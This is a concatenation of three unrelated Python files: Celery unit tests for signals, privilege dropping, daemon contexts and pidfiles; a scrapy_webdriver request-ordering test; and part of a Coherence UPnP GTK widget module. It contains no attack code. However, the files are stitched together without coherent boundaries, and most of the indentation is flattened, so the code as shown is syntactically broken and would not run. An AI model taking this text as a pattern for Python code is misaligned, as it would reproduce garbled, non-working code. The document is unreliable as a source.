class test_set_process_title(Case):
    def test_when_no_setproctitle(self):
        # Swap out _setproctitle via tuple unpacking and restore it afterwards.
        prev, platforms._setproctitle = platforms._setproctitle, None
try:
set_process_title('foo')
finally:
platforms._setproctitle = prev
class test_Signals(Case):
@patch('signal.getsignal')
def test_getitem(self, getsignal):
signals['SIGINT']
getsignal.assert_called_with(signal.SIGINT)
def test_supported(self):
self.assertTrue(signals.supported('INT'))
self.assertFalse(signals.supported('SIGIMAGINARY'))
def test_reset_alarm(self):
if sys.platform == 'win32':
raise SkipTest('signal.alarm not available on Windows')
with patch('signal.alarm') as _alarm:
signals.reset_alarm()
_alarm.assert_called_with(0)
def test_arm_alarm(self):
if hasattr(signal, 'setitimer'):
with patch('signal.setitimer', create=True) as seti:
signals.arm_alarm(30)
self.assertTrue(seti.called)
def test_signum(self):
self.assertEqual(signals.signum(13), 13)
self.assertEqual(signals.signum('INT'), signal.SIGINT)
self.assertEqual(signals.signum('SIGINT'), signal.SIGINT)
with self.assertRaises(TypeError):
signals.signum('int')
signals.signum(object())
@patch('signal.signal')
def test_ignore(self, set):
signals.ignore('SIGINT')
set.assert_called_with(signals.signum('INT'), signals.ignored)
signals.ignore('SIGTERM')
set.assert_called_with(signals.signum('TERM'), signals.ignored)
@patch('signal.signal')
def test_setitem(self, set):
handle = lambda *a: a
signals['INT'] = handle
set.assert_called_with(signal.SIGINT, handle)
@patch('signal.signal')
def test_setitem_raises(self, set):
set.side_effect = ValueError()
signals['INT'] = lambda *a: a
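
# The remaining cases exercise POSIX-only facilities (fd limits, uid/gid
# handling, daemonization, pidfiles and group lists), so they are only
# defined when not running on Windows.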
if not platforms.IS_WINDOWS:
class test_get_fdmax(Case):
@patch('resource.getrlimit')
def test_when_infinity(self, getrlimit):
with patch('os.sysconf') as sysconfig:
sysconfig.side_effect = KeyError()
getrlimit.return_value = [None, resource.RLIM_INFINITY]
default = object()
self.assertIs(get_fdmax(default), default)
@patch('resource.getrlimit')
def test_when_actual(self, getrlimit):
with patch('os.sysconf') as sysconfig:
sysconfig.side_effect = KeyError()
getrlimit.return_value = [None, 13]
self.assertEqual(get_fdmax(None), 13)
class test_maybe_drop_privileges(Case):
@patch('celery.platforms.parse_uid')
@patch('pwd.getpwuid')
@patch('celery.platforms.setgid')
@patch('celery.platforms.setuid')
@patch('celery.platforms.initgroups')
def test_with_uid(self, initgroups, setuid, setgid,
getpwuid, parse_uid):
class pw_struct(object):
pw_gid = 50001
def raise_on_second_call(*args, **kwargs):
setuid.side_effect = OSError()
setuid.side_effect.errno = errno.EPERM
setuid.side_effect = raise_on_second_call
getpwuid.return_value = pw_struct()
parse_uid.return_value = 5001
maybe_drop_privileges(uid='user')
parse_uid.assert_called_with('user')
getpwuid.assert_called_with(5001)
setgid.assert_called_with(50001)
initgroups.assert_called_with(5001, 50001)
setuid.assert_has_calls([call(5001), call(0)])
@patch('celery.platforms.parse_uid')
@patch('celery.platforms.parse_gid')
@patch('celery.platforms.setgid')
@patch('celery.platforms.setuid')
@patch('celery.platforms.initgroups')
def test_with_guid(self, initgroups, setuid, setgid,
parse_gid, parse_uid):
def raise_on_second_call(*args, **kwargs):
setuid.side_effect = OSError()
setuid.side_effect.errno = errno.EPERM
setuid.side_effect = raise_on_second_call
parse_uid.return_value = 5001
parse_gid.return_value = 50001
maybe_drop_privileges(uid='user', gid='group')
parse_uid.assert_called_with('user')
parse_gid.assert_called_with('group')
setgid.assert_called_with(50001)
initgroups.assert_called_with(5001, 50001)
setuid.assert_has_calls([call(5001), call(0)])
setuid.side_effect = None
with self.assertRaises(RuntimeError):
maybe_drop_privileges(uid='user', gid='group')
setuid.side_effect = OSError()
setuid.side_effect.errno = errno.EINVAL
with self.assertRaises(OSError):
maybe_drop_privileges(uid='user', gid='group')
@patch('celery.platforms.setuid')
@patch('celery.platforms.setgid')
@patch('celery.platforms.parse_gid')
def test_only_gid(self, parse_gid, setgid, setuid):
parse_gid.return_value = 50001
maybe_drop_privileges(gid='group')
parse_gid.assert_called_with('group')
setgid.assert_called_with(50001)
self.assertFalse(setuid.called)
class test_setget_uid_gid(Case):
@patch('celery.platforms.parse_uid')
@patch('os.setuid')
def test_setuid(self, _setuid, parse_uid):
parse_uid.return_value = 5001
setuid('user')
parse_uid.assert_called_with('user')
_setuid.assert_called_with(5001)
@patch('celery.platforms.parse_gid')
@patch('os.setgid')
def test_setgid(self, _setgid, parse_gid):
parse_gid.return_value = 50001
setgid('group')
parse_gid.assert_called_with('group')
_setgid.assert_called_with(50001)
def test_parse_uid_when_int(self):
self.assertEqual(parse_uid(5001), 5001)
@patch('pwd.getpwnam')
def test_parse_uid_when_existing_name(self, getpwnam):
class pwent(object):
pw_uid = 5001
getpwnam.return_value = pwent()
self.assertEqual(parse_uid('user'), 5001)
@patch('pwd.getpwnam')
def test_parse_uid_when_nonexisting_name(self, getpwnam):
getpwnam.side_effect = KeyError('user')
with self.assertRaises(KeyError):
parse_uid('user')
def test_parse_gid_when_int(self):
self.assertEqual(parse_gid(50001), 50001)
@patch('grp.getgrnam')
def test_parse_gid_when_existing_name(self, getgrnam):
class grent(object):
gr_gid = 50001
getgrnam.return_value = grent()
self.assertEqual(parse_gid('group'), 50001)
@patch('grp.getgrnam')
def test_parse_gid_when_nonexisting_name(self, getgrnam):
getgrnam.side_effect = KeyError('group')
with self.assertRaises(KeyError):
parse_gid('group')
class test_initgroups(Case):
@patch('pwd.getpwuid')
@patch('os.initgroups', create=True)
def test_with_initgroups(self, initgroups_, getpwuid):
getpwuid.return_value = ['user']
initgroups(5001, 50001)
initgroups_.assert_called_with('user', 50001)
@patch('celery.platforms.setgroups')
@patch('grp.getgrall')
@patch('pwd.getpwuid')
def test_without_initgroups(self, getpwuid, getgrall, setgroups):
prev = getattr(os, 'initgroups', None)
try:
delattr(os, 'initgroups')
except AttributeError:
pass
try:
getpwuid.return_value = ['user']
class grent(object):
gr_mem = ['user']
def __init__(self, gid):
self.gr_gid = gid
getgrall.return_value = [grent(1), grent(2), grent(3)]
initgroups(5001, 50001)
setgroups.assert_called_with([1, 2, 3])
finally:
if prev:
os.initgroups = prev
class test_detached(Case):
def test_without_resource(self):
prev, platforms.resource = platforms.resource, None
try:
with self.assertRaises(RuntimeError):
detached()
finally:
platforms.resource = prev
@patch('celery.platforms._create_pidlock')
@patch('celery.platforms.signals')
@patch('celery.platforms.maybe_drop_privileges')
@patch('os.geteuid')
@patch(open_fqdn)
def test_default(self, open, geteuid, maybe_drop,
signals, pidlock):
geteuid.return_value = 0
context = detached(uid='user', gid='group')
self.assertIsInstance(context, DaemonContext)
signals.reset.assert_called_with('SIGCLD')
maybe_drop.assert_called_with(uid='user', gid='group')
open.return_value = Mock()
geteuid.return_value = 5001
context = detached(uid='user', gid='group', logfile='/foo/bar')
self.assertIsInstance(context, DaemonContext)
self.assertTrue(context.after_chdir)
context.after_chdir()
open.assert_called_with('/foo/bar', 'a')
open.return_value.close.assert_called_with()
context = detached(pidfile='/foo/bar/pid')
self.assertIsInstance(context, DaemonContext)
self.assertTrue(context.after_chdir)
context.after_chdir()
pidlock.assert_called_with('/foo/bar/pid')
class test_DaemonContext(Case):
@patch('os.fork')
@patch('os.setsid')
@patch('os._exit')
@patch('os.chdir')
@patch('os.umask')
@patch('os.close')
@patch('os.closerange')
@patch('os.open')
@patch('os.dup2')
def test_open(self, dup2, open, close, closer, umask, chdir,
_exit, setsid, fork):
x = DaemonContext(workdir='/opt/workdir', umask=0o22)
x.stdfds = [0, 1, 2]
fork.return_value = 0
with x:
self.assertTrue(x._is_open)
with x:
pass
self.assertEqual(fork.call_count, 2)
setsid.assert_called_with()
self.assertFalse(_exit.called)
chdir.assert_called_with(x.workdir)
umask.assert_called_with(0o22)
self.assertTrue(dup2.called)
fork.reset_mock()
fork.return_value = 1
x = DaemonContext(workdir='/opt/workdir')
x.stdfds = [0, 1, 2]
with x:
pass
self.assertEqual(fork.call_count, 1)
_exit.assert_called_with(0)
x = DaemonContext(workdir='/opt/workdir', fake=True)
x.stdfds = [0, 1, 2]
x._detach = Mock()
with x:
pass
self.assertFalse(x._detach.called)
x.after_chdir = Mock()
with x:
pass
x.after_chdir.assert_called_with()
class test_Pidfile(Case):
@patch('celery.platforms.Pidfile')
def test_create_pidlock(self, Pidfile):
p = Pidfile.return_value = Mock()
p.is_locked.return_value = True
p.remove_if_stale.return_value = False
with override_stdouts() as (_, err):
with self.assertRaises(SystemExit):
create_pidlock('/var/pid')
self.assertIn('already exists', err.getvalue())
p.remove_if_stale.return_value = True
ret = create_pidlock('/var/pid')
self.assertIs(ret, p)
def test_context(self):
p = Pidfile('/var/pid')
p.write_pid = Mock()
p.remove = Mock()
with p as _p:
self.assertIs(_p, p)
p.write_pid.assert_called_with()
p.remove.assert_called_with()
def test_acquire_raises_LockFailed(self):
p = Pidfile('/var/pid')
p.write_pid = Mock()
p.write_pid.side_effect = OSError()
with self.assertRaises(LockFailed):
with p:
pass
@patch('os.path.exists')
def test_is_locked(self, exists):
p = Pidfile('/var/pid')
exists.return_value = True
self.assertTrue(p.is_locked())
exists.return_value = False
self.assertFalse(p.is_locked())
def test_read_pid(self):
with mock_open() as s:
s.write('1816\n')
s.seek(0)
p = Pidfile('/var/pid')
self.assertEqual(p.read_pid(), 1816)
def test_read_pid_partially_written(self):
with mock_open() as s:
s.write('1816')
s.seek(0)
p = Pidfile('/var/pid')
with self.assertRaises(ValueError):
p.read_pid()
def test_read_pid_raises_ENOENT(self):
exc = IOError()
exc.errno = errno.ENOENT
with mock_open(side_effect=exc):
p = Pidfile('/var/pid')
self.assertIsNone(p.read_pid())
def test_read_pid_raises_IOError(self):
exc = IOError()
exc.errno = errno.EAGAIN
with mock_open(side_effect=exc):
p = Pidfile('/var/pid')
with self.assertRaises(IOError):
p.read_pid()
def test_read_pid_bogus_pidfile(self):
with mock_open() as s:
s.write('eighteensixteen\n')
s.seek(0)
p = Pidfile('/var/pid')
with self.assertRaises(ValueError):
p.read_pid()
@patch('os.unlink')
def test_remove(self, unlink):
unlink.return_value = True
p = Pidfile('/var/pid')
p.remove()
unlink.assert_called_with(p.path)
@patch('os.unlink')
def test_remove_ENOENT(self, unlink):
exc = OSError()
exc.errno = errno.ENOENT
unlink.side_effect = exc
p = Pidfile('/var/pid')
p.remove()
unlink.assert_called_with(p.path)
@patch('os.unlink')
def test_remove_EACCES(self, unlink):
exc = OSError()
exc.errno = errno.EACCES
unlink.side_effect = exc
p = Pidfile('/var/pid')
p.remove()
unlink.assert_called_with(p.path)
@patch('os.unlink')
def test_remove_OSError(self, unlink):
exc = OSError()
exc.errno = errno.EAGAIN
unlink.side_effect = exc
p = Pidfile('/var/pid')
with self.assertRaises(OSError):
p.remove()
unlink.assert_called_with(p.path)
@patch('os.kill')
def test_remove_if_stale_process_alive(self, kill):
p = Pidfile('/var/pid')
p.read_pid = Mock()
p.read_pid.return_value = 1816
kill.return_value = 0
self.assertFalse(p.remove_if_stale())
kill.assert_called_with(1816, 0)
p.read_pid.assert_called_with()
kill.side_effect = OSError()
kill.side_effect.errno = errno.ENOENT
self.assertFalse(p.remove_if_stale())
@patch('os.kill')
def test_remove_if_stale_process_dead(self, kill):
with override_stdouts():
p = Pidfile('/var/pid')
p.read_pid = Mock()
p.read_pid.return_value = 1816
p.remove = Mock()
exc = OSError()
exc.errno = errno.ESRCH
kill.side_effect = exc
self.assertTrue(p.remove_if_stale())
kill.assert_called_with(1816, 0)
p.remove.assert_called_with()
def test_remove_if_stale_broken_pid(self):
with override_stdouts():
p = Pidfile('/var/pid')
p.read_pid = Mock()
p.read_pid.side_effect = ValueError()
p.remove = Mock()
self.assertTrue(p.remove_if_stale())
p.remove.assert_called_with()
def test_remove_if_stale_no_pidfile(self):
p = Pidfile('/var/pid')
p.read_pid = Mock()
p.read_pid.return_value = None
p.remove = Mock()
self.assertTrue(p.remove_if_stale())
p.remove.assert_called_with()
@patch('os.fsync')
@patch('os.getpid')
@patch('os.open')
@patch('os.fdopen')
@patch(open_fqdn)
def test_write_pid(self, open_, fdopen, osopen, getpid, fsync):
getpid.return_value = 1816
osopen.return_value = 13
w = fdopen.return_value = WhateverIO()
w.close = Mock()
r = open_.return_value = WhateverIO()
r.write('1816\n')
r.seek(0)
p = Pidfile('/var/pid')
p.write_pid()
w.seek(0)
self.assertEqual(w.readline(), '1816\n')
self.assertTrue(w.close.called)
getpid.assert_called_with()
osopen.assert_called_with(p.path, platforms.PIDFILE_FLAGS,
platforms.PIDFILE_MODE)
fdopen.assert_called_with(13, 'w')
fsync.assert_called_with(13)
open_.assert_called_with(p.path)
@patch('os.fsync')
@patch('os.getpid')
@patch('os.open')
@patch('os.fdopen')
@patch(open_fqdn)
def test_write_reread_fails(self, open_, fdopen,
osopen, getpid, fsync):
getpid.return_value = 1816
osopen.return_value = 13
w = fdopen.return_value = WhateverIO()
w.close = Mock()
r = open_.return_value = WhateverIO()
r.write('11816\n')
r.seek(0)
p = Pidfile('/var/pid')
with self.assertRaises(LockFailed):
p.write_pid()
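
    # _setgroups_hack retries os.setgroups with progressively smaller group
    # lists to cope with platform limits; the cases below simulate a platform
    # that only accepts up to 200 supplementary groups.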
class test_setgroups(Case):
@patch('os.setgroups', create=True)
def test_setgroups_hack_ValueError(self, setgroups):
def on_setgroups(groups):
if len(groups) <= 200:
setgroups.return_value = True
return
raise ValueError()
setgroups.side_effect = on_setgroups
_setgroups_hack(list(range(400)))
setgroups.side_effect = ValueError()
with self.assertRaises(ValueError):
_setgroups_hack(list(range(400)))
@patch('os.setgroups', create=True)
def test_setgroups_hack_OSError(self, setgroups):
exc = OSError()
exc.errno = errno.EINVAL
def on_setgroups(groups):
if len(groups) <= 200:
setgroups.return_value = True
return
raise exc
setgroups.side_effect = on_setgroups
_setgroups_hack(list(range(400)))
setgroups.side_effect = exc
with self.assertRaises(OSError):
_setgroups_hack(list(range(400)))
            exc2 = OSError()
            exc2.errno = errno.ESRCH
setgroups.side_effect = exc2
with self.assertRaises(OSError):
_setgroups_hack(list(range(400)))
@patch('os.sysconf')
@patch('celery.platforms._setgroups_hack')
def test_setgroups(self, hack, sysconf):
sysconf.return_value = 100
setgroups(list(range(400)))
hack.assert_called_with(list(range(100)))
@patch('os.sysconf')
@patch('celery.platforms._setgroups_hack')
def test_setgroups_sysconf_raises(self, hack, sysconf):
sysconf.side_effect = ValueError()
setgroups(list(range(400)))
hack.assert_called_with(list(range(400)))
@patch('os.getgroups')
@patch('os.sysconf')
@patch('celery.platforms._setgroups_hack')
def test_setgroups_raises_ESRCH(self, hack, sysconf, getgroups):
sysconf.side_effect = ValueError()
esrch = OSError()
esrch.errno = errno.ESRCH
hack.side_effect = esrch
with self.assertRaises(OSError):
setgroups(list(range(400)))
@patch('os.getgroups')
@patch('os.sysconf')
@patch('celery.platforms._setgroups_hack')
def test_setgroups_raises_EPERM(self, hack, sysconf, getgroups):
sysconf.side_effect = ValueError()
eperm = OSError()
eperm.errno = errno.EPERM
hack.side_effect = eperm
getgroups.return_value = list(range(400))
setgroups(list(range(400)))
getgroups.assert_called_with()
getgroups.return_value = [1000]
with self.assertRaises(OSError):
setgroups(list(range(400)))
getgroups.assert_called_with()
|
from functools import partial
from time import sleep
from mock import call, Mock
from scrapy.crawler import Crawler
from scrapy.http import Request
from scrapy import log, signals
from scrapy.settings import Settings
from scrapy.spider import BaseSpider
from scrapy.xlib.pydispatch import dispatcher
from twisted.internet import reactor
from scrapy_webdriver.http import WebdriverRequest
BASE_SETTINGS = dict(
DOWNLOAD_HANDLERS={
'http': 'scrapy_webdriver.download.WebdriverDownloadHandler',
'https': 'scrapy_webdriver.download.WebdriverDownloadHandler',
},
SPIDER_MIDDLEWARES={
'scrapy_webdriver.middlewares.WebdriverSpiderMiddleware': 543,
})
class TestRequestQueue:
@classmethod
def setup_class(cls):
cls._settings = BASE_SETTINGS
def settings(self, **options):
settings = self._settings.copy()
settings.update(**options)
return settings
def _stop_reactor(self):
reactor.stop()
def _wait(self, url, *args, **kwargs):
sleep(0.1)
def test_priorization(self):
webdriver = Mock()
settings = self.settings(WEBDRIVER_BROWSER=webdriver)
webdriver.get.side_effect = self._wait
webdriver.page_source = u''
dispatcher.connect(self._stop_reactor, signal=signals.spider_closed)
crawler = Crawler(Settings(values=settings))
crawler.configure()
spider = self.Spider(name='test', domain='testdomain')
crawler.crawl(spider)
crawler.start()
log.start(loglevel='ERROR')
reactor.run()
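        # The expected call order below encodes the prioritization contract:
        # action requests (wa=...) spawned by a response run before the next
        # top-level request, and their follow-up requests (trailing wr=0) are
        # downloaded last.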
assert webdriver.get.mock_calls == [
call('http://testdomain/path?wr=0'),
call('http://testdomain/path?wr=0&wa=0'),
call('http://testdomain/path?wr=0&wa=1'),
call('http://testdomain/path?wr=1'),
call('http://testdomain/path?wr=1&wa=0'),
call('http://testdomain/path?wr=1&wa=1'),
call('http://testdomain/path?wr=0&wa=0&wr=0'),
call('http://testdomain/path?wr=0&wa=1&wr=0'),
call('http://testdomain/path?wr=1&wa=0&wr=0'),
call('http://testdomain/path?wr=1&wa=1&wr=0')]
class Spider(BaseSpider):
def start_requests(self):
for i in xrange(2):
yield WebdriverRequest('http://testdomain/path?wr=%d' % i)
yield Request('http://testdomain/path?r=%d' % i)
def parse(self, response):
def get(url):
response.webdriver.get(url)
for i in xrange(2):
fake_url = '%s&wa=%d' % (response.url, i)
request = response.action_request(url=fake_url,
callback=self.parse_action)
# Leave a trace in the webdriver instance mock so we can look
# at the request processing order.
request.actions = Mock()
request.actions.perform.side_effect = partial(get, fake_url)
yield request
def parse_action(self, response):
yield WebdriverRequest('%s&wr=%d' % (response.url, 0),
callback=self.parse_nothing)
def parse_nothing(self, response):
pass
|
""" simple and hopefully reusable widgets to ease
the creation of UPnP UI applications
icons taken from the Tango Desktop Project
"""
import os.path
import urllib
import traceback
import pygtk
pygtk.require("2.0")
import gtk
import gobject
import dbus
from dbus.mainloop.glib import DBusGMainLoop
DBusGMainLoop(set_as_default=True)
import dbus.service
import mimetypes
mimetypes.init()
BUS_NAME = 'org.Coherence'
OBJECT_PATH = '/org/Coherence'
NAME_COLUMN = 0
ID_COLUMN = 1
UPNP_CLASS_COLUMN = 2
CHILD_COUNT_COLUMN = 3
UDN_COLUMN = 4
SERVICE_COLUMN = 5
ICON_COLUMN = 6
DIDL_COLUMN = 7
TOOLTIP_ICON_COLUMN = 8
from pkg_resources import resource_filename
class ControlPoint(object):
_instance_ = None # Singleton
def __new__(cls, *args, **kwargs):
obj = getattr(cls, '_instance_', None)
if obj is not None:
return obj
else:
            obj = super(ControlPoint, cls).__new__(cls)
cls._instance_ = obj
obj._connect(*args, **kwargs)
return obj
def __init__(self):
pass
def _connect(self):
self.bus = dbus.SessionBus()
self.coherence = self.bus.get_object(BUS_NAME,OBJECT_PATH)
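
# ControlPoint is a process-wide singleton around the Coherence D-Bus
# connection; every widget below shares one session-bus proxy through it:
#
#     coherence = ControlPoint().coherence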
class DeviceExportWidget(object):
def __init__(self,name='Nautilus',standalone=True,root=None):
self.root=root
self.uuid = None
self.name = name
self.standalone=standalone
icon = resource_filename(__name__, os.path.join('icons','emblem-new.png'))
self.new_icon = gtk.gdk.pixbuf_new_from_file(icon)
icon = resource_filename(__name__, os.path.join('icons','emblem-shared.png'))
self.shared_icon = gtk.gdk.pixbuf_new_from_file(icon)
icon = resource_filename(__name__, os.path.join('icons','emblem-unreadable.png'))
self.unshared_icon = gtk.gdk.pixbuf_new_from_file(icon)
self.filestore = gtk.ListStore(str,gtk.gdk.Pixbuf)
self.coherence = ControlPoint().coherence
def build_ui(self,root=None):
        if root is not None:
            self.root = root
self.window = gtk.VBox(homogeneous=False, spacing=0)
self.fileview = gtk.TreeView(self.filestore)
column = gtk.TreeViewColumn('Folders to share')
self.fileview.append_column(column)
icon_cell = gtk.CellRendererPixbuf()
text_cell = gtk.CellRendererText()
column.pack_start(icon_cell, False)
column.pack_start(text_cell, True)
column.set_attributes(text_cell, text=0)
column.add_attribute(icon_cell, "pixbuf",1)
self.window.pack_start(self.fileview,expand=True,fill=True)
buttonbox = gtk.HBox(homogeneous=False, spacing=0)
button = gtk.Button(stock=gtk.STOCK_ADD)
button.set_sensitive(False)
button.connect("clicked", self.new_files)
buttonbox.pack_start(button, expand=False,fill=False, padding=2)
button = gtk.Button(stock=gtk.STOCK_REMOVE)
#button.set_sensitive(False)
button.connect("clicked", self.remove_files)
buttonbox.pack_start(button, expand=False,fill=False, padding=2)
button = gtk.Button(stock=gtk.STOCK_CANCEL)
button.connect("clicked", self.share_cancel)
buttonbox.pack_start(button, expand=False,fill=False, padding=2)
button = gtk.Button(stock=gtk.STOCK_APPLY)
button.connect("clicked", self.share_files)
buttonbox.pack_start(button, expand=False,fill=False, padding=2)
self.window.pack_end(buttonbox,expand=False,fill=False)
return self.window
def share_cancel(self,button):
        # Materialize the rows first so removal is safe while iterating:
        # newly added rows are discarded, unshared rows revert to shared.
        for row in list(self.filestore):
            if row[1] == self.new_icon:
                self.filestore.remove(row.iter)
                continue
            if row[1] == self.unshared_icon:
                row[1] = self.shared_icon
if self.standalone:
gtk.main_quit()
else:
self.root.hide()
def share_files(self,button):
print "share_files with", self.uuid
folders = []
        # Remove rows marked unshared and collect the remaining folder paths.
        for row in list(self.filestore):
            if row[1] == self.unshared_icon:
                self.filestore.remove(row.iter)
                continue
            folders.append(row[0])
        if self.uuid is None:
if len(folders) > 0:
self.uuid = self.coherence.add_plugin('FSStore', {'name': self.name,
'version':'1',
'create_root': 'yes',
'import_folder': '/tmp/UPnP Imports',
'content':','.join(folders)},
dbus_interface=BUS_NAME)
#self.coherence.pin('Nautilus::MediaServer::%d'%os.getpid(),self.uuid)
else:
result = self.coherence.call_plugin(self.uuid,'update_config',{'content':','.join(folders)})
if result != self.uuid:
print "something failed", result
for row in self.filestore:
row[1] = self.shared_icon
self.root.hide()
def add_files(self,files):
print "add_files", files
for filename in files:
for row in self.filestore:
if os.path.abspath(filename) == row[0]:
break
else:
self.add_file(filename)
def add_file(self,filename):
self.filestore.append([os.path.abspath(filename),self.new_icon])
def new_files(self,button):
print "new_files"
def remove_files(self,button):
print "remove_files"
selection = self.fileview.get_selection()
print selection
model, selected_rows = selection.get_selected_rows()
for row_path in selected_rows:
#model.remove(model.get_iter(row_path))
row = model[row_path]
row[1] = self.unshared_icon
class DeviceImportWidget(object):
def __init__(self,standalone=True,root=None):
self.standalone=standalone
self.root=root
self.build_ui()
self.init_controlpoint()
def build_ui(self):
self.window = gtk.VBox(homogeneous=False, spacing=0)
self.combobox = gtk.ComboBox()
self.store = gtk.ListStore(str, # 0: friendly name
str, # 1: device udn
gtk.gdk.Pixbuf)
icon = resource_filename(__name__, os.path.join('icons','network-server.png'))
self.device_icon = gtk.gdk.pixbuf_new_from_file(icon)
# create a CellRenderers to render the data
icon_cell = gtk.CellRendererPixbuf()
text_cell = gtk.CellRendererText()
self.combobox.pack_start(icon_cell, False)
self.combobox.pack_start(text_cell, True)
self.combobox.set_attributes(text_cell, text=0)
self.combobox.add_attribute(icon_cell, "pixbuf",2)
self.combobox.set_model(self.store)
item = self.store.append(None)
self.store.set_value(item, 0, 'Select a MediaServer...')
self.store.set_value(item, 1, '')
self.store.set_value(item, 2, None)
self.combobox.set_active(0)
self.window.pack_start(self.combobox,expand=False,fill=False)
self.filestore = gtk.ListStore(str)
self.fileview = gtk.TreeView(self.filestore)
column = gtk.TreeViewColumn('Files')
self.fileview.append_column(column)
text_cell = gtk.CellRendererText()
column.pack_start(text_cell, True)
column.set_attributes(text_cell, text=0)
self.window.pack_start(self.fileview,expand=True,fill=True)
buttonbox = gtk.HBox(homogeneous=False, spacing=0)
button = gtk.Button(stock=gtk.STOCK_ADD)
button.set_sensitive(False)
button.connect("clicked", self.new_files)
buttonbox.pack_start(button, expand=False,fill=False, padding=2)
button = gtk.Button(stock=gtk.STOCK_REMOVE)
button.set_sensitive(False)
button.connect("clicked", self.remove_files)
buttonbox.pack_start(button, expand=False,fill=False, padding=2)
button = gtk.Button(stock=gtk.STOCK_CANCEL)
if self.standalone:
button.connect("clicked", gtk.main_quit)
else:
button.connect("clicked", lambda x: self.root.destroy())
buttonbox.pack_start(button, expand=False,fill=False, padding=2)
button = gtk.Button(stock=gtk.STOCK_APPLY)
button.connect("clicked", self.import_files)
buttonbox.pack_start(button, expand=False,fill=False, padding=2)
self.window.pack_end(buttonbox,expand=False,fill=False)
def add_file(self,filename):
self.filestore.append([os.path.abspath(filename)])
def new_files(self,button):
print "new_files"
def remove_files(self,button):
print "remove_files"
def import_files(self,button):
print "import_files"
active = self.combobox.get_active()
if active <= 0:
print "no MediaServer selected"
return None
friendlyname, uuid,_ = self.store[active]
try:
row = self.filestore[0]
print 'import to', friendlyname,os.path.basename(row[0])
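            # Upload-queue sketch: each successful put_resource removes row 0
            # and re-enters import_files(), draining the store one file at a
            # time until the IndexError below ends the recursion.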
def success(r):
print 'success',r
self.filestore.remove(self.filestore.get_iter(0))
self.import_files(None)
def reply(r):
print 'reply',r['Result'], r['ObjectID']
from coherence.upnp.core import DIDLLite
didl = DIDLLite.DIDLElement.fromString(r['Result'])
item = didl.getItems()[0]
res = item.res.get_matching(['*:*:*:*'], protocol_type='http-get')
if len(res) > 0:
print 'importURI',res[0].importUri
self.coherence.put_resource(res[0].importUri,row[0],
reply_handler=success,
error_handler=self.handle_error)
            mimetype,_ = mimetypes.guess_type(row[0], strict=False)
            # guess_type returns (None, None) for unknown types
            if mimetype is None:
                upnp_class = 'object.item'
            elif mimetype.startswith('image/'):
upnp_class = 'object.item.imageItem'
elif mimetype.startswith('video/'):
upnp_class = 'object.item.videoItem'
elif mimetype.startswith('audio/'):
upnp_class = 'object.item.audioItem'
else:
upnp_class = 'object.item'
self.coherence.create_object(uuid,'DLNA.ORG_AnyContainer',
{'parentID':'DLNA.ORG_AnyContainer','upnp_class':upnp_class,'title':os.path.basename(row[0])},
reply_handler=reply,
error_handler=self.handle_error)
except IndexError:
pass
def handle_error(self,error):
print error
def handle_devices_reply(self,devices):
for device in devices:
if device['device_type'].split(':')[3] == 'MediaServer':
self.media_server_found(device)
def init_controlpoint(self):
cp = ControlPoint()
self.bus = cp.bus
self.coherence = cp.coherence
self.coherence.get_devices(dbus_interface=BUS_NAME,
reply_handler=self.handle_devices_reply,
error_handler=self.handle_error)
self.coherence.connect_to_signal('UPnP_ControlPoint_MediaServer_detected', self.media_server_found, dbus_interface=BUS_NAME)
self.coherence.connect_to_signal('UPnP_ControlPoint_MediaServer_removed', self.media_server_removed, dbus_interface=BUS_NAME)
self.devices = {}
def media_server_found(self,device,udn=None):
for service in device['services']:
service_type = service.split('/')[-1]
if service_type == 'ContentDirectory':
def got_icons(r,udn,item):
print 'got_icons', r
for icon in r:
###FIXME, we shouldn't just use the first icon
icon_loader = gtk.gdk.PixbufLoader()
icon_loader.write(urllib.urlopen(str(icon['url'])).read())
icon_loader.close()
icon = icon_loader.get_pixbuf()
icon = icon.scale_simple(16,16,gtk.gdk.INTERP_BILINEAR)
self.store.set_value(item, 2, icon)
break
def reply(r,udn):
if 'CreateObject' in r:
self.devices[udn] = {'ContentDirectory':{}}
self.devices[udn]['ContentDirectory']['actions'] = r
item = self.store.append(None)
self.store.set_value(item, 0, str(device['friendly_name']))
self.store.set_value(item, 1, str(device['udn']))
self.store.set_value(item, 2, self.device_icon)
d = self.bus.get_object(BUS_NAME+'.device',device['path'])
d.get_device_icons(reply_handler=lambda x : got_icons(x,str(device['udn']),item),error_handler=self.handle_error)
s = self.bus.get_object(BUS_NAME+'.service',service)
s.get_available_actions(reply_handler=lambda x : reply(x,str(device['udn'])),error_handler=self.handle_error)
def media_server_removed(self,udn):
row_count = 0
for row in self.store:
if udn == row[1]:
self.store.remove(self.store.get_iter(row_count))
del self.devices[str(udn)]
break
row_count += 1
class TreeWidget(object):
def __init__(self,cb_item_dbl_click=None,
cb_resource_chooser=None):
self.cb_item_dbl_click = cb_item_dbl_click
self.cb_item_right_click = None
self.cb_resource_chooser = cb_resource_chooser
self.build_ui()
self.init_controlpoint()
def build_ui(self):
self.window = gtk.ScrolledWindow()
self.window.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)
icon = resource_filename(__name__, os.path.join('icons','network-server.png'))
self.device_icon = gtk.gdk.pixbuf_new_from_file(icon)
icon = resource_filename(__name__, os.path.join('icons','folder.png'))
self.folder_icon = gtk.gdk.pixbuf_new_from_file(icon)
icon = resource_filename(__name__, os.path.join('icons','audio-x-generic.png'))
self.audio_icon = gtk.gdk.pixbuf_new_from_file(icon)
icon = resource_filename(__name__, os.path.join('icons','video-x-generic.png'))
self.video_icon = gtk.gdk.pixbuf_new_from_file(icon)
icon = resource_filename(__name__, os.path.join('icons','image-x-generic.png'))
self.image_icon = gtk.gdk.pixbuf_new_from_file(icon)
self.store = gtk.TreeStore(str, # 0: name or title
str, # 1: id, '0' for the device
str, # 2: upnp_class, 'root' for the device
int, # 3: child count, -1 if not available
str, # 4: device udn, '' for an item
str, # 5: service path, '' for a non container item
gtk.gdk.Pixbuf,
str, # 7: DIDLLite fragment, '' for a non upnp item
gtk.gdk.Pixbuf
)
self.treeview = gtk.TreeView(self.store)
self.column = gtk.TreeViewColumn('MediaServers')
self.treeview.append_column(self.column)
# create a CellRenderers to render the data
icon_cell = gtk.CellRendererPixbuf()
text_cell = gtk.CellRendererText()
self.column.pack_start(icon_cell, False)
self.column.pack_start(text_cell, True)
self.column.set_attributes(text_cell, text=0)
self.column.add_attribute(icon_cell, "pixbuf",6)
#self.column.set_cell_data_func(self.cellpb, get_icon)
#self.treeview.insert_column_with_attributes(-1, 'MediaServers', cell, text=0)
self.treeview.connect("row-activated", self.browse)
